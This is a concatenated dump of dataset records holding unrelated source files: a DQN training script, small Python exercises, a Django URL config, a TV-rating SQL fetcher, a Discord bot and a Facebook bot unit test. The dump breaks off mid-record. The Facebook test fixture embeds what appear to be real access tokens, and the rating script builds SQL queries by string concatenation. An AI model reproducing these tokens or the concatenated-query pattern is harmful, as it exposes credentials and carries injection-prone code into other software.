(str): Source weight (copy from)\n Returns:\n List[tf.Operation]: Update operations are created and returned\n \"\"\"\n # Copy variables src_scope to dest_scope\n op_holder = []\n\n src_vars = tf.get_collection(\n tf.GraphKeys.TRAINABLE_VARIABLES, scope=src_scope_name)\n dest_vars = tf.get_collection(\n tf.GraphKeys.TRAINABLE_VARIABLES, scope=dest_scope_name)\n\n for src_var, dest_var in zip(src_vars, dest_vars):\n op_holder.append(dest_var.assign(src_var.value()))\n\n return op_holder\n\n\ndef bot_play(mainDQN: dqn.DQN, env: lec_info.Env) -> None:\n \"\"\"Test runs with rendering and prints the total 
score\n Args:\n mainDQN (dqn.DQN): DQN agent to run a test\n env (gym.Env): Gym Environment\n \"\"\"\n state = env.reset()\n reward_sum = 0\n\n while True:\n action = np.argmax(mainDQN.predict(state))\n state, reward, done = env.step(action)\n reward_sum += reward\n\n if done:\n env.render()\n print(\"Total score: {}\".format(reward_sum))\n break\n\n\ndef main():\n # store the previous observations in replay memory\n replay_buffer = deque(maxlen=REPLAY_MEMORY)\n\n Ehistory = []\n Rhistory = []\n\n with tf.Session() as sess:\n mainDQN = dqn.DQN(sess, INPUT_SIZE, OUTPUT_SIZE, name=\"main\")\n targetDQN = dqn.DQN(sess, INPUT_SIZE, OUTPUT_SIZE, name=\"target\")\n sess.run(tf.global_variables_initializer())\n\n # initial copy q_net -> target_net\n copy_ops = get_copy_var_ops(dest_scope_name=\"target\",\n src_scope_name=\"main\")\n sess.run(copy_ops)\n # pre train\n for pre_episode in range(MAX_PRE_EPISODES):\n #np.random.seed(int(time.time()))\n e = 1. / ((pre_episode / 100) + 1)\n if e < 0.05:\n e = 0.05\n\n done = False\n step_count = 0\n state = env.reset(True) # set time to 1-array\n total_reward = 0\n\n while not done:\n if np.random.rand() < e:\n action = env.action_sample()\n else:\n # Choose an action by greedily from the Q-network\n action = np.argmax(mainDQN.predict(state))\n\n # Get new state and reward from environment\n next_state, reward, done = env.step(action)\n\n # Save the experience to our buffer\n replay_buffer.append((state, action, reward, next_state, done))\n\n if len(replay_buffer) > BATCH_SIZE:\n minibatch = random.sample(replay_buffer, BATCH_SIZE)\n loss, _ = replay_train(mainDQN, targetDQN, minibatch)\n\n if step_count % TARGET_UPDATE_FREQUENCY == 0:\n sess.run(copy_ops)\n\n total_reward += reward\n state = next_state\n step_count += 1\n\n if pre_episode % 100 == 0:\n print(\"Pre_Episode: {} steps: {} reward: {} esp: {}\".format(pre_episode, step_count, total_reward, e))\n env.render()\n # train\n \n for episode in range(MAX_EPISODES):\n #np.random.seed(int(time.time()))\n e = 1. 
/ ((episode / 150) + 1)\n if e < 0.002:\n e = 0.002\n done = False\n step_count = 0\n state = env.reset()\n total_reward = 0\n\n if episode % 100 == 0:\n print(\"New episode==========================================\")\n\n while not done:\n if np.random.rand() < e:\n action = env.action_sample()\n else:\n # Choose an action by greedily from the Q-network\n action = np.argmax(mainDQN.predict(state))\n\n if episode % 100 == 0:\n print(\"state\", state)\n print(\"predict\", mainDQN.predict(state))\n # Get new state and reward from environment\n next_state, reward, done = env.step(action)\n\n # Save the experience to our buffer\n replay_buffer.append((state, action, reward, next_state, done))\n\n\n if len(replay_buffer) > BATCH_SIZE:\n minibatch = random.sample(replay_buffer, BATCH_SIZE)\n loss, _ = replay_train(mainDQN, targetDQN, minibatch)\n\n if step_count % TARGET_UPDATE_FREQUENCY == 0:\n sess.run(copy_ops)\n\n total_reward += reward\n state = next_state\n step_count += 1\n\n if episode % 100 == 0 or reward >= 0:\n print(\"Episode: {} steps: {} reward: {} esp: {}\".format(episode, step_count, total_reward, e))\n env.render()\n print(\"end episode==========================================\\n\\n\")\n\n if step_count == lec_info.total_time:\n Ehistory.append(episode)\n Rhistory.append(total_reward) \n\n # result\n bot_play(mainDQN, env)\n\n # show learning graph\n plt.plot(Ehistory, Rhistory)\n plt.show()\n\n \nif __name__ == \"__main__\":\n main()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"293395053","text":"#This project takes all multiples of 3 and 5 below 1000\n#and takes the sum of them\n\ntotal = 0\n\nfor i in range(1, 1000):\n if (i % 3) == 0 or (i % 5) == 0:\n total += i\n\nprint(str(total))","sub_path":"Project-Euler/Problem 1.py","file_name":"Problem 1.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"49528460","text":"\"\"\"Created the application-level urls\"\"\"\nfrom django.urls import path\n\nfrom blog.views import post_list, post_detail\n\napp_name = 'blog' # The application namespace; it must be unique across the whole project\n\nurlpatterns = [\n path('////', post_detail, name='post_detail'),\n path('', post_list, name='post_list'), # name lets us refer to this view from anywhere in the project\n # by name (app_name : name), in our case *** urls \"blog:post_list\" ***\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"600124116","text":"# coding: utf-8\n\"\"\"\nFile overview: fetch the audience-rating data for the desired demographic segments of each TV channel.\nFetches the rating data for each of the setai,kozin,C,T,M1,M2,M3,F1,F2,F3 segments.\nNote: the time window fetched is the end of the CM\n\"\"\"\nimport sys\nsys.path.append('../..') # needed so dao can be imported\nfrom util import dao # fetches data from BigQuery\nimport pandas as pd\nimport time\n\ndef get_target_rate(df):\n \"\"\"\n Function overview: fetch the target data from BigQuery.\n Here the TV rating data is fetched as an average over the window.\n \"\"\"\n start_day = str(df[\"housou_day_s\"])\n end_day = str(df[\"housou_day_e\"])\n start_time = str(df[\"time_s\"])\n end_time = str(df[\"time_e\"])\n media_id = df[\"media_id\"]\n query = \"SELECT AVG(setai),AVG(kozin),AVG(child0412),AVG(child1319),AVG(M1),AVG(M2),AVG(M3),AVG(F1),AVG(F2),AVG(F3) \"+ \"FROM vr_minute WHERE media_id='\" + media_id\n\n # What follows depends on whether the window spans two days.\n if start_day != end_day:\n query += \"' AND (housou_day = '\" + start_day + \"' AND time >= \"+start_time + \") OR (housou_day = '\" + end_day + \"' AND time<= \" + end_time + \")\"\n else:\n query += \"' AND housou_day = '\" + start_day + \"' AND time>=\"+start_time+\" AND time<=\"+end_time\n df = dao.read_sql_data(query, db_type='db_prod_kanto')\n # Error handling\n if len(df.values)==0: return [\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\",\"-\"]\n return df.values[0].tolist()\n\n# Main processing\nif __name__ == \"__main__\":\n start = time.time() # program start time\n year_month = sys.argv[1]\n # Load the data\n VRinfo = pd.read_csv('A_time/CM/prepro_' + year_month + '.csv')\n ten_col = ['media_id', 'housou_day_s', 'housou_day_e', 'time_s','time_e',\n 'id','ken_id','keishiki', 'nettype', 'shubetu']\n VR_tmp = VRinfo.loc[:,ten_col] # keep the 10 columns matching the data we want.\n colname = [\"setai\",\"kozin\",\"C\",\"T\",\"M1\",\"M2\",\"M3\",\"F1\",\"F2\",\"F3\"]\n\n # Fetch the desired ratings for the specified time window.\n df_VR_rate = VR_tmp.apply(lambda x:get_target_rate(x), axis=1)\n colname = [colname[i]+\"_rate\" for i in range(len(colname))]\n df_VR_rate.columns = colname\n df_VR_rate.to_csv('A_time/rate/' + year_month + '_ave_vr_rate.csv', index = False)\n print(\"{} [ave VR] {:.2f}[s] have passed since the start. The number of CMs is {}.\".format(year_month, time.time()-start, len(VRinfo)))\n","sub_path":"ave_rate.py","file_name":"ave_rate.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"646443251","text":"#Preston Knibbe\n#B7\n#pknibbe3@gatech.edu\n#903074340\n#I worked on the homework assignment alone, using this semester's course materials\n\nfrom Myro import *\n\ninit(\"com12\")\n\ndef getValues(numSamples):\n numSamples = int(numSamples)\n if numSamples == 1:\n a = getLight(\"center\")\n return a\n else:\n a = []\n for x in xrange(numSamples):\n a.append(getLight(\"center\"))\n turnLeft(1, .25)\n return a\n\ndef even(x):\n if x % 2 == 0:\n return True\n else:\n return False\n\ndef printStatistics(a):\n 
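\"\"\"Print the average, max, min, and count of even values in a list of readings.\"\"\"\n 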
avg = sum(a)/len(a)\n maxi = max(a)\n mini = min(a)\n count = 0\n for x in a:\n if even(x):\n count = count + 1\n print(\"The average of this list is \",avg,\" the max is \",maxi,\" the min is \",mini,\" and the number of even numbers is \", count)\n","sub_path":"ra_lists.py","file_name":"ra_lists.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"462726861","text":"# -*-coding: utf-8-*-\n# Author : Christopher Lee\n# License: Apache License\n# File : baidu.py\n# Date : 2017-04-14 14-10\n# Version: 0.0.1\n# Description: description of this file.\n\nimport datetime\nimport os\n\nfrom lxml.html import fromstring\nfrom ..common.storage import (SQLiteStorage, NullStorage,\n NULL_STORAGE, SQLITE_STORAGE)\nfrom ..common.downloader import Downloader\n\n__version__ = '0.0.1'\n__author__ = 'Chris'\n\n_dict_directory = os.path.abspath(os.path.dirname(__file__))\n\n\nclass BaiduChineseWordPageParser(object):\n def __init__(self, page_content):\n self._tree = fromstring(page_content)\n\n @property\n def pronunciation(self):\n try:\n p = (self._tree.xpath(\"//div[@id='pinyin']/h2/span/b/text()\")[0]).strip()\n return p.replace('[', '').replace(']', '')\n except:\n return ''\n\n @property\n def paraphrase(self):\n try:\n return ''.join(x.strip() for x in self._tree.xpath(\"//div[@id='basicmean-wrapper']/div[1]/text()\"))\n except:\n return ''\n\n @property\n def synonyms(self):\n try:\n return ' '.join(x.strip() for x in self._tree.xpath(\"//div[@id='synonym']//a/text()\"))\n except:\n return ''\n\n @property\n def antonyms(self):\n try:\n return ' '.join(x.strip() for x in self._tree.xpath(\"//div[@id='antonym']//a/text()\"))\n except:\n return ''\n\n @property\n def translation(self):\n try:\n return ''.join(x.strip() for x in self._tree.xpath(\"//div[@id='fanyi-wrapper']/div[1]//text()\"))\n except:\n return ''\n\n\nclass BaiduChineseWordDictionary(object):\n \"\"\"\n Website: `http://hanyu.baidu.com/`.\n \"\"\"\n host = 'hanyu.baidu.com'\n timeout = 48\n parser = BaiduChineseWordPageParser\n\n def __init__(self, storage_filename='', storage_type=None):\n \"\"\"\n :param storage_filename: file or database name to save words and their details\n :param storage_type: NULL_STORAGE, SQLITE_STORAGE\n \"\"\"\n storage = {\n NULL_STORAGE: NullStorage,\n SQLITE_STORAGE: SQLiteStorage,\n }.get(storage_type, SQLiteStorage)\n\n self._storage = storage(storage_filename or os.path.join(_dict_directory, 'dict.db'))\n self._storage.prepare()\n\n self._downloader = Downloader(self.host)\n\n def query(self, word, check_storage=True, proxy=None):\n \"\"\"\n Query a word from Baidu HanYu website.\n\n :param word: `str` keyword to be queried.\n :param proxy:\n 1. http proxy: `http://user:password@host:port`\n 1. 
socks5 proxy: `socks://user:password@host:port`\n Note: run `pip3 install -U requests[socks]` before using socks proxy.\n :param check_storage: whether check local cache file before sending request to BaiduHanyu\n :return: details of this word.\n \"\"\"\n assert isinstance(word, str)\n assert len(word) >= 2, RuntimeError('Expected a word, not a character: {}'.format(word))\n\n word = word.strip()\n\n if check_storage is True:\n cache = self._storage.get(word)\n if cache is not None:\n return cache\n\n r = self._downloader.get(self.make_url(word), proxy=proxy, timeout=self.timeout)\n details = self._parse_page(word, r)\n\n if details:\n self._storage.set(word, details)\n\n return details\n\n def make_url(self, word):\n return 'http://{}/s?wd={}'.format(self.host, word)\n\n def _parse_page(self, word, response):\n try:\n parser = self.parser(response.content)\n\n return {\n 'word': word,\n 'pronunciation': parser.pronunciation,\n 'paraphrase': parser.paraphrase,\n 'synonyms': parser.synonyms,\n 'antonyms': parser.antonyms,\n 'translation': parser.translation,\n 'url': response.url,\n 'timestamp': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n }\n except Exception as err:\n print('{}: {}'.format(word, err))\n return None\n","sub_path":"dictionary/cn_dict/baidu.py","file_name":"baidu.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"369525071","text":"#! /usr/bin/env python\n\n# Outputs 1000 random preference votes on 5 alternatives a, b, c, d, e\n\nimport sys\nfout = sys.stdout\n\nimport random\nstart = range(5)\n\nfor i in xrange(1000):\n random.shuffle(start)\n fout.write(' > '.join(chr(ord('a')+x) for x in start) + \"\\n\")\n","sub_path":"uniform.py","file_name":"uniform.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"256677164","text":"class Glass:\n capacity = 250\n\n def __init__(self):\n self.content = 0\n\n def fill(self, ml):\n if self.content + ml > self.capacity:\n return f\"Cannot add {ml} ml\"\n self.content += ml\n return f\"Glass filled with {ml} ml\"\n\n def empty(self):\n self.content = 0\n return f\"Glass is now empty\"\n\n def info(self):\n return f\"{Glass.capacity - self.content} ml left\"\n\n\nglass = Glass()\nprint(glass.capacity)\nGlass.capacity = 6000\nprint(glass.capacity)\nglass_2 = Glass()\nprint(glass_2.capacity)\n","sub_path":"glass.py","file_name":"glass.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"314467936","text":"#!/usr/bin/env python3\n\nimport asyncio\nimport unittest\nimport logging\n\nimport insteonplm\n\n@asyncio.coroutine\ndef test():\n log = logging.getLogger(__name__)\n\n def log_callback(message):\n log.info('Callback invoked: %s' % message)\n\n device = '/dev/ttyUSB0'\n\n log.info('Connecting to PLM on %s', device)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(test())\n","sub_path":"tests/fulltests.py","file_name":"fulltests.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"267713135","text":"import discord\n\nimport jim.config as config\nfrom jim import registrations\nfrom jim.util import util\n\nclient = discord.Client()\n\n\n@client.event\nasync def on_ready():\n print('Logged in as %s (%s)' % 
(client.user.name, client.user.id,))\n registrations.register_cmds()\n registrations.register_patterns()\n\n\n# @client.event\n# async def on_member_update(_, after):\n# await twitch.notify(client, after)\n\n\n@client.event\nasync def on_message(message):\n if (message.guild is not None and message.author == message.guild.me) or len(message.content) < 1:\n return\n\n if util.is_command(message):\n print(\"%s sent command %s\" % (message.author.name, message.content,))\n if util.check_permissions(message):\n response = await util.run_command(client, message)\n if util.send_to_pm(message):\n await message.author.send(response)\n else:\n await message.channel.send(response)\n else:\n await message.channel.send(\"You do not have permission to use this command.\")\n\n res = await util.check_patterns(client, message)\n if res is not None:\n await message.channel.send(res)\n\n\ndef main():\n client.run(config.config_get(\"general\", \"user_token\"))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"jim/scripts/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"97"} +{"seq_id":"490827403","text":"\"\"\"\nReceived {u'entry': [{u'changes': [{u'field': u'feed', u'value': {u'item': u'post', u'verb': u'add', u'sender_id': 100008124789809, u'post_id': 814165888607693}}], u'id': u'757899520900997', u'time': 1405417187}], u'object': u'page'}\nGot post: {'created_time': '2014-07-15T09:39:47+0000', 'message': 'A new post on a new page', 'id': '757899520900997_814165888607693'}\nPushed {'channels': ['53c3ec19cea0992596520960'], 'user_profile': {'user_name': 'Mnt Poster'}, 'url': 'https://www.facebook.com/757899520900997/posts/814165888607693', 'sender_id': '100008124789809', 'content': 'A new post on a new page', 'facebook': {'created_at': '2014-07-15T09:39:47+0000', 'facebook_post_id': '757899520900997_814165888607693', 'page_id': '757899520900997'}}\n\n\nReceived {u'entry': [{u'changes': [{u'field': u'feed', u'value': {u'item': u'post', u'verb': u'add', u'sender_id': 100008124789809, u'post_id': 814170268607255}}], u'id': u'757899520900997', u'time': 1405418183}], u'object': u'page'}\nGot post: {'created_time': '2014-07-15T09:56:23+0000', 'message': 'Another new post on a new page', 'id': '757899520900997_814170268607255'}\nPushed {'channels': ['53c3ec19cea0992596520960'], 'user_profile': {'user_name': 'Mnt Poster'}, 'url': 'https://www.facebook.com/757899520900997/posts/814170268607255', 'sender_id': '100008124789809', 'content': 'Another new post on a new page', 'facebook': {'created_at': '2014-07-15T09:56:23+0000', 'facebook_post_id': '757899520900997_814170268607255', 'page_id': '757899520900997'}}\n\"\"\"\nimport json\nimport facebook\nimport time\nimport unittest\n\nfrom solariat_bottle.tests.base import BaseCase\nfrom solariat_bottle.daemons.facebook.facebook_client import FacebookBot\nfrom solariat_bottle.db.post.facebook import FacebookPost, parse_datetime\nfrom solariat_bottle.db.channel.facebook import EnterpriseFacebookChannel, FacebookServiceChannel\nfrom solariat_bottle.db.user_profiles.user_profile import UserProfile\nfrom solariat_bottle.utils import facebook_driver\n\n\nclass GraphAPIStub(object):\n \"\"\"\n Stub class for actual GraphAPI to avoid facebook direct interaction during post processing.\n \"\"\"\n ME_ACCOUNT = {'data': [{'access_token': 
'CAAUaxYoDeUsBALC4RAptECIs2QpMe41VIi3knQpPUZB4VGx8ALgQFO813DJxjYe9xSkEVSnl3bu6kfyjVZCpuGWN9mk053PCoF3Emi4ZB7ZBkmZAkbTkZAS8S1sT5RavkLkrwiZAnvsk3DR57LzfCb1aGn17pcTs0RWLu6LUrFN9LRyiwpKUdQd',\n 'category': 'Community',\n 'id': '708605282549671',\n 'name': 'Solariat Dev Page',\n 'perms': ['ADMINISTER',\n 'EDIT_PROFILE',\n 'CREATE_CONTENT',\n 'MODERATE_CONTENT',\n 'CREATE_ADS',\n 'BASIC_ADMIN']}],\n 'paging': {'next': 'https://graph.facebook.com/v1.0/100005966506625/accounts?access_token=CAAUaxYoDeUsBAAVKaPUXDNLBysNeH3ob91Ey56UkTqpIsmjiUYtkyMMRZAwnWCLER3RScVIKEPOOBZBaHk49EvZCNR1ATfrZBP9te3ccwyAsU0zPScFUpLiL7EgZCqmrc208hmJXKWeUGuyQUZBxHaI69QPE9FWZBKGFZAkojqQLoXo7SJC37qe9RvNbGsQtDOROl0kVKhCVkV7vbJaQkePHOhmHzbN9XvCOnjnPZAd5QNPmn2kgAtkIE&limit=1000&offset=1000&__after_id=enc_Aezq2b9HI6yxEkiRxl0syOatkUcs3xrVWsUgjfKKNWgQXuVj2-xvYsr6PT5b8W4XCcRdILZu0OxODAg0kLbl86cs'}}\n\n\n OBJECTS = [{'actions': [{'link': 'https://www.facebook.com/757899520900997/posts/814165888607693',\n 'name': 'Comment'},\n {'link': 'https://www.facebook.com/757899520900997/posts/814165888607693',\n 'name': 'Like'}],\n 'created_time': '2014-07-15T09:39:47+0000',\n 'from': {'id': '100008124789809',\n 'name': 'Mnt Poster'},\n 'id': '757899520900997_814165888607693',\n 'message': 'A new post on a new page',\n 'privacy': {'value': ''},\n 'to': {'data': [{'category': 'App page',\n 'id': '757899520900997',\n 'name': 'Monitor Solariat'}]},\n 'type': 'status',\n 'updated_time': '2014-07-15T09:39:47+0000'},\n\n {'actions': [{'link': 'https://www.facebook.com/757899520900997/posts/825258484165100',\n 'name': 'Comment'},\n {'link': 'https://www.facebook.com/757899520900997/posts/825258484165100',\n 'name': 'Like'}],\n 'created_time': '2014-07-15T09:39:49+0000',\n 'from': {'id': '100008124789809',\n 'name': 'Mnt Poster'},\n 'id': '757899520900997_825258484165100',\n 'message': 'Testing post-reply pair',\n 'privacy': {'value': ''},\n 'to': {'data': [{'category': 'App page',\n 'id': '757899520900997',\n 'name': 'Monitor Solariat'}]},\n 'type': 'status',\n 'updated_time': '2014-07-15T09:39:49+0000'},\n\n {'actions': [{'link': 'https://www.facebook.com/757899520900997/posts/825259480831667',\n 'name': 'Comment'},\n {'link': 'https://www.facebook.com/757899520900997/posts/825259480831667',\n 'name': 'Like'}],\n 'created_time': '2014-07-15T09:39:51+0000',\n 'from': {'id': '100008124789809',\n 'name': 'Mnt Poster'},\n 'id': '825258484165100_825259480831667',\n 'message': 'Thanks for reaching out. 
Testing scenario',\n 'privacy': {'value': ''},\n 'to': {'data': [{'category': 'App page',\n 'id': '757899520900997',\n 'name': 'Poster Solariat'}]},\n 'type': 'status',\n 'updated_time': '2014-07-15T09:39:51+0000'},\n\n {'first_name': 'Mnt1',\n 'gender': 'female',\n 'id': '100008124789809',\n 'last_name': 'Poster',\n 'link': 'https://www.facebook.com/profile.php?id=100008124789809',\n 'locale': 'en_US',\n 'name': 'Mnt Poster',\n 'picture': {'data': {'is_silhouette': True,\n 'url': 'https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xpf1/t1.0-1/c15.0.50.50/p50x50/1509246_10150002137498325_1584423246374331045_n.jpg'}},\n 'updated_time': '2014-04-04T12:11:53+0000'},\n\n {'first_name': 'Mnt',\n 'gender': 'female',\n 'id': '100008145211355',\n 'last_name': 'Poster',\n 'link': 'https://www.facebook.com/profile.php?id=100008145211355',\n 'locale': 'en_US',\n 'name': 'Mnt Creator',\n 'picture': {'data': {'is_silhouette': True,\n 'url': 'https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xpf1/t1.0-1/c15.0.50.50/p50x50/1509246_10150002137498325_1584423246374331045_n.jpg'}},\n 'updated_time': '2014-04-04T12:11:53+0000'},\n\n ]\n\n def __init__(self, access_token=None, timeout=None, version=None, channel=None):\n self.access_token = access_token\n self.timeout = timeout\n\n def get_object(self, object_id, **kwargs):\n if '/picture' in object_id:\n return {}\n if object_id == '/me/accounts':\n return self.ME_ACCOUNT\n for post in self.OBJECTS:\n if post['id'] == object_id:\n if 'fields' in kwargs:\n return {field: post.get(field, \"\") for field in kwargs['fields'].split(',') + ['id']}\n else:\n return post\n raise facebook.GraphAPIError({\"error\": {\"message\": \"(#803) Some of the aliases you requested do not exist: %s\" % object_id,\n \"type\": \"OAuthException\",\n \"code\": 803}})\n\n def request(self, *args, **kwargs):\n # Nothing to do here for now, we can't register for realtime updates in test environment\n pass\n\n\nFACEBOOK_DATA = {u'entry': [{u'changes': [{u'field': u'feed',\n u'value': {u'item': u'post',\n u'verb': u'add',\n u'sender_id': 100008124789809,\n u'post_id': 814165888607693}}],\n u'id': u'757899520900997',\n u'time': 1405417187}],\n u'object': u'page'}\n\nMAX_TIMEOUT = 5\n\n\n\n@unittest.skip(\"No longer use python based bot\")\nclass FacebookBotCase(BaseCase):\n\n def setUp(self):\n self.real_api = facebook_driver.GraphAPI\n facebook_driver.GraphAPI = GraphAPIStub\n super(FacebookBotCase, self).setUp()\n self.fb_bot = FacebookBot(username=self.user.email,\n lockfile=\"fb_bot_test_lockfile\",\n concurrency=2,\n heartbeat=1)\n\n def tearDown(self):\n facebook_driver.GraphAPI = self.real_api\n self.fb_bot.stop()\n\n def test_one_post_happy_flow(self):\n \"\"\" Just a basic test of the main flow. Start a datasift bot, pass it some datasift data that\n would get matched in our system, check that it's actually created and matched properly. 
\"\"\"\n efc_channel = EnterpriseFacebookChannel.objects.create_by_user(self.user, title=\"FB_ACC\")\n efc_channel.facebook_access_token = 'test'\n srv_channel = FacebookServiceChannel.objects.create_by_user(self.user, title='FB_INB')\n\n page_id = FACEBOOK_DATA['entry'][0]['id']\n srv_channel.facebook_page_ids.append(page_id)\n efc_channel.facebook_page_ids.append(page_id)\n srv_channel.on_active()\n efc_channel.on_active()\n srv_channel.save()\n efc_channel.save()\n\n self.assertEqual(FacebookPost.objects.count(), 0)\n\n self.fb_bot.start()\n\n for idx in xrange(MAX_TIMEOUT):\n time.sleep(1)\n if self.fb_bot.is_running():\n break\n else:\n self.fail(\"Bot never got started after waiting %s seconds.\" % MAX_TIMEOUT)\n\n self.fb_bot.post_received(json.dumps(FACEBOOK_DATA))\n\n for idx in xrange(MAX_TIMEOUT):\n time.sleep(1)\n if not (self.fb_bot.is_busy() or self.fb_bot.is_blocked()):\n break\n else:\n self.fail(\"Post processing did not finish after waiting %s seconds\" % MAX_TIMEOUT)\n\n self.assertEqual(FacebookPost.objects.count(), 1)\n created_post = FacebookPost.objects.find_one()\n expected_create_time = parse_datetime('2014-07-15T09:39:47+0000')\n self.assertEqual(expected_create_time, created_post.created_at)\n self.assertTrue(isinstance(created_post.user_profile, UserProfile))\n self.assertDictEqual(created_post.user_profile.platform_data,\n {'first_name': 'Mnt1',\n 'gender': 'female',\n 'id': '100008124789809',\n 'last_name': 'Poster',\n 'link': 'https://www.facebook.com/profile.php?id=100008124789809',\n 'locale': 'en_US',\n 'name': 'Mnt Poster',\n 'picture': {'data': {'is_silhouette': True,\n 'url': 'https://fbcdn-profile-a.akamaihd.net/hprofile-ak-xpf1/t1.0-1/c15.0.50.50/p50x50/1509246_10150002137498325_1584423246374331045_n.jpg'}},\n 'updated_time': '2014-04-04T12:11:53+0000'})\n self.assertEqual(created_post.content, 'A new post on a new page')\n self.assertTrue(str(srv_channel.inbound_channel.id) in created_post.channel_assignments)\n self.assertEqual(created_post.channel_assignments[str(srv_channel.inbound_channel.id)], 'highlighted')\n self.assertDictEqual(created_post.wrapped_data,\n {u'expanded_height': u'',\n u'via': u'',\n u'attachments': u'',\n u'icon': u'',\n u'feed_targeting': u'',\n u'actions': [{u'link': u'https://www.facebook.com/757899520900997/posts/814165888607693',\n u'name': u'Comment'},\n {u'link': u'https://www.facebook.com/757899520900997/posts/814165888607693',\n u'name': u'Like'}],\n u'height': u'',\n u'promotion_status': u'',\n u'shares': u'',\n u'created_time': u'2014-07-15T09:39:47+0000',\n u'is_hidden': u'',\n u'id': u'757899520900997_814165888607693',\n u'to': {u'data': [{u'category': u'App page',\n u'id': u'757899520900997',\n u'name': u'Monitor Solariat'}]},\n u'description': u'',\n u'story': u'',\n u'from': {u'id': u'100008124789809',\n u'name': u'Mnt Poster'},\n u'privacy': {u'value': u''},\n u'object_id': u'',\n u'application': u'',\n u'expanded_width': u'',\n u'parent_id': u'',\n u'story_tags': u'',\n u'coordinates': u'',\n u'type': u'status',\n u'status_type': u'',\n u'is_popular': u'',\n u'picture': u'',\n u'scheduled_publish_time': u'',\n u'full_picture': u'',\n u'link': u'',\n u'targeting': u'',\n u'timeline_visibility': u'',\n u'properties': u'',\n u'insights': u'',\n u'name': u'',\n u'comments_mirroring_domain': u'',\n u'call_to_action': u'',\n u'with_tags': u'',\n u'message': u'A new post on a new page',\n u'message_tags': u'',\n u'updated_time': u'2014-07-15T09:39:47+0000',\n u'caption': u'',\n u'place': u'',\n u'source': u'',\n 
u'child_attachments': u'',\n u'is_published': u'',\n u'width': u'',\n u'likes': u''})\n\n self.fb_bot.stop()\n\n for idx in xrange(MAX_TIMEOUT * 4):\n time.sleep(1)\n if not self.fb_bot.isAlive():\n break\n else:\n self.fail(\"Bot never stopped after waiting %s seconds.\" % (4 * MAX_TIMEOUT))\n\n def test_post_reply(self):\n \"\"\"\n Received {u'entry': [{u'changes': [{u'field': u'feed', u'value': {u'item': u'post', u'verb': u'add', u'sender_id': 100008124789809, u'post_id': u'757899520900997_825258484165100'}}], u'id': u'757899520900997', u'time': 1407237249}], u'object': u'page'}\n Got post: {'created_time': '2014-08-05T11:14:09+0000', 'message': 'Testing post-reply pair', 'id': '757899520900997_825258484165100'}\n Pushed {'channels': ['53e0bbf4cea0991f3be1fd17'], 'user_profile': {'user_name': 'Mnt Poster'}, 'url': 'https://www.facebook.com/757899520900997/posts/825258484165100', 'content': 'Testing post-reply pair', 'facebook': {'created_at': '2014-08-05T11:14:09+0000', 'facebook_post_id': '757899520900997_825258484165100', 'page_id': '757899520900997'}}\n\n Received {u'entry': [{u'changes': [{u'field': u'feed', u'value': {u'parent_id': u'757899520900997_825258484165100', u'comment_id': u'825258484165100_825259480831667', u'sender_id': 100008145211355, u'item': u'comment', u'verb': u'add', u'created_time': 1407237438}}], u'id': u'757899520900997', u'time': 1407237438}], u'object': u'page'}\n Got comment: {'created_time': '2014-08-05T11:17:17+0000', 'message': 'Thanks for reaching out. Testing scenario ', 'id': '825258484165100_825259480831667'}\n Pushed {'channels': ['53e0bbf4cea0991f3be1fd18'], 'user_profile': {'user_name': 'Mnt Creator'}, 'url': 'https://www.facebook.com/permalink.php?comment_id=757899520900997_825258484165100&story_fbid=825258484165100&id=757899520900997&reply_comment_id=825259480831667', 'content': 'Thanks for reaching out. 
Testing scenario ', 'facebook': {'in_reply_to_status_id': '757899520900997_757899520900997_825258484165100', 'facebook_post_id': '825258484165100_825259480831667', 'page_id': '757899520900997', 'created_at': '2014-08-05T11:17:17+0000'}}\n \"\"\"\n post_data = {u'entry': [{u'changes': [{u'field': u'feed',\n u'value': {u'item': u'post',\n u'verb': u'add',\n u'sender_id': 100008124789809,\n u'post_id': u'757899520900997_825258484165100'}}],\n u'id': u'757899520900997',\n u'time': 1407237249}],\n u'object': u'page'}\n reply_data = {u'entry': [{u'changes': [{u'field': u'feed',\n u'value': {u'parent_id': u'757899520900997_825258484165100',\n u'comment_id': u'825258484165100_825259480831667',\n u'sender_id': 100008145211355,\n u'item': u'comment',\n u'verb': u'add',\n u'created_time': 1407237438}}],\n u'id': u'757899520900997',\n u'time': 1407237438}],\n u'object': u'page'}\n\n efc_channel = EnterpriseFacebookChannel.objects.create_by_user(self.user, title=\"FB_ACC\")\n efc_channel.facebook_access_token = \"test\"\n srv_channel = FacebookServiceChannel.objects.create_by_user(self.user, title='FB_INB')\n\n page_id = post_data['entry'][0]['id']\n srv_channel.facebook_page_ids.append(page_id)\n efc_channel.facebook_page_ids.append(page_id)\n efc_channel.facebook_handle_id = 